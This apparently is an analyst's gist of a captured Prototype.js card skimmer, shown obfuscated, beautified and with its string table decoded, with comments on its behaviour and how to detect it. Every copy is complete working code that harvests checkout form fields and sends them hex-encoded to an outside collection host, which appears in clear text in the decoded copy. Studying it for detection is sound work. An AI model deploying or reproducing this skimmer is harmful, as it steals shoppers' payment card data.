
@krautface
Created August 27, 2019 04:13
A simple skimmer with hex encoded values
// Analyst notes (sample kept byte-for-byte below so hashes and signatures still match).
// Form-field skimmer. Every property name, the CSS selector and the collection URL sit
// hex-escaped in the _0xf97f string table and are reached by index, so a plain-text
// search of the file for "querySelectorAll", "Ajax" targets or the host name finds nothing.
// Decoded table: [0] "click", [1] "", [2] "length", [3] "charCodeAt",
// [4] "input, select, textarea, checkbox", [5] "querySelectorAll", [6] "value", [7] "name",
// [8] "=", [9] "&", [10] "exec", [12] "observe",
// [11] collection endpoint, defanged here: hxxps://shellsn[.]ru/d.php?d=
// Behaviour: Event.observe(document, "click", handler) registers a document-wide click
// handler (Event.observe and Ajax.Request are Prototype.js APIs, so Prototype must already
// be loaded on the page). On each click the handler walks every element matched by [4],
// skips empty values, and builds a "name=value&" string, using the element's index when
// its name is empty. Only if that string matches /cc_cid/ does it hex-encode the whole
// string (charCodeAt(i).toString(16), no zero padding) and issue new Ajax.Request with the
// encoded data appended to [11] as the d parameter.
// NOTE(review): cc_cid resembles the card-verification field name of Magento 1 payment
// forms; confirm against the affected site.
// Detection: requests from checkout pages to a host outside the site's allow-list carrying
// a long hex-only d= value; a CSP connect-src allow-list would block the request.
var _0xf97f=["\x63\x6C\x69\x63\x6B","","\x6C\x65\x6E\x67\x74\x68","\x63\x68\x61\x72\x43\x6F\x64\x65\x41\x74","\x69\x6E\x70\x75\x74\x2C\x20\x73\x65\x6C\x65\x63\x74\x2C\x20\x74\x65\x78\x74\x61\x72\x65\x61\x2C\x20\x63\x68\x65\x63\x6B\x62\x6F\x78","\x71\x75\x65\x72\x79\x53\x65\x6C\x65\x63\x74\x6F\x72\x41\x6C\x6C","\x76\x61\x6C\x75\x65","\x6E\x61\x6D\x65","\x3D","\x26","\x65\x78\x65\x63","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x73\x68\x65\x6C\x6C\x73\x6E\x2E\x72\x75\x2F\x64\x2E\x70\x68\x70\x3F\x64\x3D","\x6F\x62\x73\x65\x72\x76\x65"];Event[_0xf97f[12]](document,_0xf97f[0],function(){function _0xd841x1(_0xd841x2){var _0xd841x3=_0xf97f[1];for(var _0xd841x4=0;_0xd841x4< _0xd841x2[_0xf97f[2]];_0xd841x4++){_0xd841x3+= _0xf97f[1]+ _0xd841x2[_0xf97f[3]](_0xd841x4).toString(16)};return _0xd841x3}var _0xd841x5=_0xf97f[1];var _0xd841x2=/cc_cid/;for(var _0xd841x6=document[_0xf97f[5]](_0xf97f[4]),_0xd841x4=0;_0xd841x4< _0xd841x6[_0xf97f[2]];_0xd841x4++){if(_0xd841x6[_0xd841x4][_0xf97f[6]][_0xf97f[2]]> 0){var _0xd841x7=_0xd841x6[_0xd841x4][_0xf97f[7]];_0xf97f[1]== _0xd841x7&& (_0xd841x7= _0xd841x4),_0xd841x5+= _0xd841x7+ _0xf97f[8]+ _0xd841x6[_0xd841x4][_0xf97f[6]]+ _0xf97f[9]}};if(_0xd841x2[_0xf97f[10]](_0xd841x5)){ new Ajax.Request(_0xf97f[11]+ _0xd841x1(_0xd841x5))}});
@krautface

The above, but beautified

// Analyst notes: form-field skimmer sample; code tokens are unchanged, only comments added.
// String table: every property name, the selector and the collection URL are stored
// hex-escaped and reached by index below, which hides them from plain-text searches.
var _0xf97f = [
  "\x63\x6C\x69\x63\x6B", // [0] "click"
  "", // [1] empty string (accumulator seed and "no name" sentinel)
  "\x6C\x65\x6E\x67\x74\x68", // [2] "length"
  "\x63\x68\x61\x72\x43\x6F\x64\x65\x41\x74", // [3] "charCodeAt"
  "\x69\x6E\x70\x75\x74\x2C\x20\x73\x65\x6C\x65\x63\x74\x2C\x20\x74\x65\x78\x74\x61\x72\x65\x61\x2C\x20\x63\x68\x65\x63\x6B\x62\x6F\x78", // [4] "input, select, textarea, checkbox"
  "\x71\x75\x65\x72\x79\x53\x65\x6C\x65\x63\x74\x6F\x72\x41\x6C\x6C", // [5] "querySelectorAll"
  "\x76\x61\x6C\x75\x65", // [6] "value"
  "\x6E\x61\x6D\x65", // [7] "name"
  "\x3D", // [8] "="
  "\x26", // [9] "&"
  "\x65\x78\x65\x63", // [10] "exec"
  "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x73\x68\x65\x6C\x6C\x73\x6E\x2E\x72\x75\x2F\x64\x2E\x70\x68\x70\x3F\x64\x3D", // [11] collection endpoint, defanged: hxxps://shellsn[.]ru/d.php?d=
  "\x6F\x62\x73\x65\x72\x76\x65" // [12] "observe"
];
// Event.observe(document, "click", handler): the handler runs on every click anywhere in
// the document. Event.observe and Ajax.Request (used at the end) are Prototype.js APIs, so
// the script only works on pages that already load Prototype.
Event[_0xf97f[12]](document, _0xf97f[0], function() {
  // Hex encoder: appends charCodeAt(i).toString(16) for each code unit of the input.
  // There is no zero padding or separator, so code units below 0x10 yield a single digit
  // and a captured payload cannot always be split back into characters unambiguously.
  function _0xd841x1(_0xd841x2) {
    var _0xd841x3 = _0xf97f[1];
    for (var _0xd841x4 = 0; _0xd841x4 < _0xd841x2[_0xf97f[2]]; _0xd841x4++) {
      _0xd841x3 += _0xf97f[1] + _0xd841x2[_0xf97f[3]](_0xd841x4).toString(16);
    }
    return _0xd841x3;
  }
  // Accumulator for the harvested "name=value&" pairs.
  var _0xd841x5 = _0xf97f[1];
  // Trigger pattern: nothing is sent unless the harvested string contains "cc_cid".
  // NOTE(review): cc_cid resembles the card-verification field name of Magento 1 payment
  // forms; confirm against the affected site.
  var _0xd841x2 = /cc_cid/;
  // Walk every element matched by document.querySelectorAll(table[4]).
  // NOTE(review): "checkbox" in that selector is a type selector for a <checkbox> element,
  // which is not an HTML element, so it presumably matches nothing.
  for (
    var _0xd841x6 = document[_0xf97f[5]](_0xf97f[4]), _0xd841x4 = 0;
    _0xd841x4 < _0xd841x6[_0xf97f[2]];
    _0xd841x4++
  ) {
    // Only fields with a non-empty value are collected.
    if (_0xd841x6[_0xd841x4][_0xf97f[6]][_0xf97f[2]] > 0) {
      var _0xd841x7 = _0xd841x6[_0xd841x4][_0xf97f[7]];
      // If the element's name is empty (loose ==), its index in the match list is used
      // as the key; then "key=value&" is appended. No filtering by field type happens
      // here, so every populated field on the page ends up in the string.
      _0xf97f[1] == _0xd841x7 && (_0xd841x7 = _0xd841x4),
        (_0xd841x5 +=
          _0xd841x7 +
          _0xf97f[8] +
          _0xd841x6[_0xd841x4][_0xf97f[6]] +
          _0xf97f[9]);
    }
  }
  // /cc_cid/.exec(...) is truthy when the pattern occurs anywhere in the string (field
  // name or value). The whole string is then hex-encoded and appended to table[11] as
  // the d query parameter of a Prototype Ajax.Request with no options object.
  // NOTE(review): Prototype's documented default method is 'post'; confirm for the
  // version in use. Either way the data travels in the URL.
  // Detection: requests from checkout pages to a host outside the site's allow-list with
  // a long hex-only d= value; a CSP connect-src allow-list would block the request.
  if (_0xd841x2[_0xf97f[10]](_0xd841x5)) {
    new Ajax.Request(_0xf97f[11] + _0xd841x1(_0xd841x5));
  }
});

@krautface

krautface commented Aug 27, 2019

The above, but with the hex-escaped string table decoded through beautifier.io (the index lookups and mangled identifiers are left as they were)

// Analyst notes: form-field skimmer sample with its string table decoded; code tokens are
// unchanged, only comments added. The identifiers are still mangled and every property
// access still goes through an index into this table.
var _0xf97f = [
    "click", // [0] event name passed to Event.observe
    "", // [1] empty string (accumulator seed and "no name" sentinel)
    "length", // [2]
    "charCodeAt", // [3] used by the hex encoder
    "input, select, textarea, checkbox", // [4] selector for the fields to harvest
    "querySelectorAll", // [5]
    "value", // [6]
    "name", // [7]
    "=", // [8] key/value separator
    "&", // [9] pair separator
    "exec", // [10] RegExp method used for the trigger test
    "https://shellsn.ru/d.php?d=", // [11] collection endpoint (IoC; defang before sharing: hxxps://shellsn[.]ru/d.php?d=)
    "observe" // [12] Event.observe
];
// Event.observe(document, "click", handler): the handler runs on every click anywhere in
// the document. Event.observe and Ajax.Request (used at the end) are Prototype.js APIs, so
// the script only works on pages that already load Prototype.
Event[_0xf97f[12]](document, _0xf97f[0], function() {
    // Hex encoder: appends charCodeAt(i).toString(16) for each code unit of the input.
    // There is no zero padding or separator, so code units below 0x10 yield a single digit
    // and a captured payload cannot always be split back into characters unambiguously.
    function _0xd841x1(_0xd841x2) {
        var _0xd841x3 = _0xf97f[1];
        for (var _0xd841x4 = 0; _0xd841x4 < _0xd841x2[_0xf97f[2]]; _0xd841x4++) {
            _0xd841x3 += _0xf97f[1] + _0xd841x2[_0xf97f[3]](_0xd841x4).toString(16);
        }
        return _0xd841x3;
    }
    // Accumulator for the harvested "name=value&" pairs.
    var _0xd841x5 = _0xf97f[1];
    // Trigger pattern: nothing is sent unless the harvested string contains "cc_cid".
    // NOTE(review): cc_cid resembles the card-verification field name of Magento 1 payment
    // forms; confirm against the affected site.
    var _0xd841x2 = /cc_cid/;
    // Walk every element matched by document.querySelectorAll(table[4]).
    // NOTE(review): "checkbox" in that selector is a type selector for a <checkbox>
    // element, which is not an HTML element, so it presumably matches nothing.
    for (
        var _0xd841x6 = document[_0xf97f[5]](_0xf97f[4]), _0xd841x4 = 0; _0xd841x4 < _0xd841x6[_0xf97f[2]]; _0xd841x4++
    ) {
        // Only fields with a non-empty value are collected.
        if (_0xd841x6[_0xd841x4][_0xf97f[6]][_0xf97f[2]] > 0) {
            var _0xd841x7 = _0xd841x6[_0xd841x4][_0xf97f[7]];
            // If the element's name is empty (loose ==), its index in the match list is
            // used as the key; then "key=value&" is appended. No filtering by field type
            // happens here, so every populated field on the page ends up in the string.
            _0xf97f[1] == _0xd841x7 && (_0xd841x7 = _0xd841x4),
                (_0xd841x5 +=
                    _0xd841x7 +
                    _0xf97f[8] +
                    _0xd841x6[_0xd841x4][_0xf97f[6]] +
                    _0xf97f[9]);
        }
    }
    // /cc_cid/.exec(...) is truthy when the pattern occurs anywhere in the string (field
    // name or value). The whole string is then hex-encoded and appended to table[11] as
    // the d query parameter of a Prototype Ajax.Request with no options object.
    // NOTE(review): Prototype's documented default method is 'post'; confirm for the
    // version in use. Either way the data travels in the URL.
    // Detection: requests from checkout pages to a host outside the site's allow-list
    // with a long hex-only d= value; a CSP connect-src allow-list would block the request.
    if (_0xd841x2[_0xf97f[10]](_0xd841x5)) {
        new Ajax.Request(_0xf97f[11] + _0xd841x1(_0xd841x5));
    }
});
